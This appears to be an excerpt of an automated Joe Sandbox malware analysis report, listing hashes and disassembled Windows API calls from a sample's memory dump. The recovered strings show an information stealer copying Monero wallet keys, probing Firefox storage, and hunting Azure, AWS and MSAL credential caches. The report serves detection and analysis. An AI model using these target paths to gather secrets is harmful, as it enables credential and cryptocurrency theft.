                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dd3a11421d302ec22fd15ef8d49da3c680f3d55e8b900e19bf3296a1e8bdc474
                        • Instruction ID: 22ebb8f33826c0fe99acf17054830b854e56ca9d949aacaa20a6cf7237a2eba4
                        • Opcode Fuzzy Hash: dd3a11421d302ec22fd15ef8d49da3c680f3d55e8b900e19bf3296a1e8bdc474
                        • Instruction Fuzzy Hash: 6A41FAF3A082109BE3186F2DEC5577AB7E5EB50310F0A493DEAC5C7780E67658448787
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00918636
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091866D
                        • lstrcpy.KERNEL32(?,00000000), ref: 009186AA
                        • StrStrA.SHLWAPI(?,015EFEF8), ref: 009186CF
                        • lstrcpyn.KERNEL32(00B393D0,?,00000000), ref: 009186EE
                        • lstrlen.KERNEL32(?), ref: 00918701
                        • wsprintfA.USER32 ref: 00918711
                        • lstrcpy.KERNEL32(?,?), ref: 00918727
                        • StrStrA.SHLWAPI(?,015EFF58), ref: 00918754
                        • lstrcpy.KERNEL32(?,00B393D0), ref: 009187B4
                        • StrStrA.SHLWAPI(?,015F00C0), ref: 009187E1
                        • lstrcpyn.KERNEL32(00B393D0,?,00000000), ref: 00918800
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                        • String ID: %s%s
                        • API String ID: 2672039231-3252725368
                        • Opcode ID: f884888475742782953aa92ad94ec197c52d1646d641bc46806dfdd83d876d95
                        • Instruction ID: 481e1b720bbf66db77e069c8f303e2e65b84b35fb1f79d49537aa3172ac38c81
                        • Opcode Fuzzy Hash: f884888475742782953aa92ad94ec197c52d1646d641bc46806dfdd83d876d95
                        • Instruction Fuzzy Hash: A0F16E72A00618AFCB11DB68DD48ADE77B9EF88700F244599F909E3250DF70AE45DFA1
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00901F9F
                        • lstrlen.KERNEL32(015E88C8), ref: 00901FAE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901FDB
                        • lstrcat.KERNEL32(00000000,?), ref: 00901FE3
                        • lstrlen.KERNEL32(00931794), ref: 00901FEE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090200E
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090201A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00902042
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090204D
                        • lstrlen.KERNEL32(00931794), ref: 00902058
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00902075
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00902081
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009020AC
                        • lstrlen.KERNEL32(?), ref: 009020E4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00902104
                        • lstrcat.KERNEL32(00000000,?), ref: 00902112
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00902139
                        • lstrlen.KERNEL32(00931794), ref: 0090214B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090216B
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00902177
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090219D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009021A8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009021D4
                        • lstrlen.KERNEL32(?), ref: 009021EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090220A
                        • lstrcat.KERNEL32(00000000,?), ref: 00902218
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00902242
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090227F
                        • lstrlen.KERNEL32(015EE368), ref: 0090228D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009022B1
                        • lstrcat.KERNEL32(00000000,015EE368), ref: 009022B9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009022F7
                        • lstrcat.KERNEL32(00000000), ref: 00902304
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090232D
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00902356
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00902382
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009023BF
                        • DeleteFileA.KERNEL32(00000000), ref: 009023F7
                        • FindNextFileA.KERNEL32(00000000,?), ref: 00902444
                        • FindClose.KERNEL32(00000000), ref: 00902453
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                        • String ID:
                        • API String ID: 2857443207-0
                        • Opcode ID: d088a985748610f927224275b79b3d1b2da3d7481cc121743504dbfe61a2e537
                        • Instruction ID: 184eaf95b59ee6ecb175e18e48ea12a8427d6ca1aeeab915e687612fd7a305ae
                        • Opcode Fuzzy Hash: d088a985748610f927224275b79b3d1b2da3d7481cc121743504dbfe61a2e537
                        • Instruction Fuzzy Hash: 7EE13D71A1161A9FCB21EFA8DE8DBAE77B9AF84700F144464F805A7291DF34DD05CBA0
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916445
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916480
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009164AA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009164E1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916506
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091650E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916537
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FolderPathlstrcat
                        • String ID: \..\
                        • API String ID: 2938889746-4220915743
                        • Opcode ID: e6189249b4ae7cbeb426315abbb6646f17a70cd3d6857e0520daf802438ccfa9
                        • Instruction ID: eaef2786ccbe0c07e090f45d0388e1786af6c002f0b45ec4a9a8f5dfaa97d81b
                        • Opcode Fuzzy Hash: e6189249b4ae7cbeb426315abbb6646f17a70cd3d6857e0520daf802438ccfa9
                        • Instruction Fuzzy Hash: D7F17B70F1161A9FCB21AF68D949BEE77B9AF84300F144168B856E7291DB34DC85CB90
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009143A3
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009143D6
                        • lstrcpy.KERNEL32(00000000,?), ref: 009143FE
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00914409
                        • lstrlen.KERNEL32(\storage\default\), ref: 00914414
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914431
                        • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0091443D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914466
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00914471
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914498
                        • lstrcpy.KERNEL32(00000000,?), ref: 009144D7
                        • lstrcat.KERNEL32(00000000,?), ref: 009144DF
                        • lstrlen.KERNEL32(00931794), ref: 009144EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914507
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00914513
                        • lstrlen.KERNEL32(.metadata-v2), ref: 0091451E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091453B
                        • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00914547
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091456E
                        • lstrcpy.KERNEL32(00000000,?), ref: 009145A0
                        • GetFileAttributesA.KERNEL32(00000000), ref: 009145A7
                        • lstrcpy.KERNEL32(00000000,?), ref: 00914601
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091462A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00914653
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091467B
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009146AF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                        • String ID: .metadata-v2$\storage\default\
                        • API String ID: 1033685851-762053450
                        • Opcode ID: 82331c6a4cc7375afb32c69a2cd00c4592fe5e3b9efdeb41fb0feeab70a4c135
                        • Instruction ID: 1101ebd9f251bbcb8578e49388dfc8df614d1438c432c9773d509e139d4dba7f
                        • Opcode Fuzzy Hash: 82331c6a4cc7375afb32c69a2cd00c4592fe5e3b9efdeb41fb0feeab70a4c135
                        • Instruction Fuzzy Hash: 2FB18E71B1161A9FCB21EF78DE89AEE77A9AF88304F140124F856E7291DF34DC458B90
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009157D5
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00915804
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915835
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091585D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00915868
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915890
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009158C8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009158D3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009158F8
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091592E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915956
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00915961
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915988
                        • lstrlen.KERNEL32(00931794), ref: 0091599A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009159B9
                        • lstrcat.KERNEL32(00000000,00931794), ref: 009159C5
                        • lstrlen.KERNEL32(015EE290), ref: 009159D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009159F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00915A02
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915A2C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915A58
                        • GetFileAttributesA.KERNEL32(00000000), ref: 00915A5F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00915AB7
                        • lstrcpy.KERNEL32(00000000,?), ref: 00915B2D
                        • lstrcpy.KERNEL32(00000000,?), ref: 00915B56
                        • lstrcpy.KERNEL32(00000000,?), ref: 00915B89
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915BB5
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00915BEF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00915C4C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00915C70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 2428362635-0
                        • Opcode ID: 81164ffac961a172e2450646be7ee220a32ce77974106a17d943637e45a02fb0
                        • Instruction ID: 0c7894766317d27a81030a7ac5f4cbe570be5ffcfa7d390d76af66c82cfa5fa3
                        • Opcode Fuzzy Hash: 81164ffac961a172e2450646be7ee220a32ce77974106a17d943637e45a02fb0
                        • Instruction Fuzzy Hash: 4802A171B11A09DFCB21EF68D989AEE77B9AF84300F164168F845A7290DF34DD85CB90
                        APIs
                          • Part of subcall function 00901120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00901135
                          • Part of subcall function 00901120: RtlAllocateHeap.NTDLL(00000000), ref: 0090113C
                          • Part of subcall function 00901120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00901159
                          • Part of subcall function 00901120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00901173
                          • Part of subcall function 00901120: RegCloseKey.ADVAPI32(?), ref: 0090117D
                        • lstrcat.KERNEL32(?,00000000), ref: 009011C0
                        • lstrlen.KERNEL32(?), ref: 009011CD
                        • lstrcat.KERNEL32(?,.keys), ref: 009011E8
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090121F
                        • lstrlen.KERNEL32(015E88C8), ref: 0090122D
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901251
                        • lstrcat.KERNEL32(00000000,015E88C8), ref: 00901259
                        • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00901264
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901288
                        • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00901294
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009012BA
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009012FF
                        • lstrlen.KERNEL32(015EE368), ref: 0090130E
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901335
                        • lstrcat.KERNEL32(00000000,?), ref: 0090133D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901378
                        • lstrcat.KERNEL32(00000000), ref: 00901385
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009013AC
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 009013D5
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901401
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090143D
                          • Part of subcall function 0091EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0091EE12
                        • DeleteFileA.KERNEL32(?), ref: 00901471
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                        • String ID: .keys$\Monero\wallet.keys
                        • API String ID: 2881711868-3586502688
                        • Opcode ID: 381aac33f2dcfc588f2b0cf7ef7996540cf8641a2b80ec0d3e6cd0de826b2e4b
                        • Instruction ID: d09ebf5d77fb5e9ebde4a428887acfa0e78efab1d4b2955fc83150e45aa864e3
                        • Opcode Fuzzy Hash: 381aac33f2dcfc588f2b0cf7ef7996540cf8641a2b80ec0d3e6cd0de826b2e4b
                        • Instruction Fuzzy Hash: 8EA15C71A11606AFCB21EBB8DE89BAE77B9AF84300F144424F915E72D1DF34ED458B90
                        APIs
                        • memset.MSVCRT ref: 0091E740
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0091E769
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E79F
                        • lstrcat.KERNEL32(?,00000000), ref: 0091E7AD
                        • lstrcat.KERNEL32(?,\.azure\), ref: 0091E7C6
                        • memset.MSVCRT ref: 0091E805
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0091E82D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E85F
                        • lstrcat.KERNEL32(?,00000000), ref: 0091E86D
                        • lstrcat.KERNEL32(?,\.aws\), ref: 0091E886
                        • memset.MSVCRT ref: 0091E8C5
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0091E8F1
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E920
                        • lstrcat.KERNEL32(?,00000000), ref: 0091E92E
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0091E947
                        • memset.MSVCRT ref: 0091E986
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$memset$FolderPathlstrcpy
                        • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 4067350539-3645552435
                        • Opcode ID: 7bb75aac6f8e5d01a8697a2168243b223a9ac16e6c0026bee2d75d27d1462410
                        • Instruction ID: 09df0aea6e6c70c28c34970106388cd45963fd479e5fdbc9bf7fd6b490cb592a
                        • Opcode Fuzzy Hash: 7bb75aac6f8e5d01a8697a2168243b223a9ac16e6c0026bee2d75d27d1462410
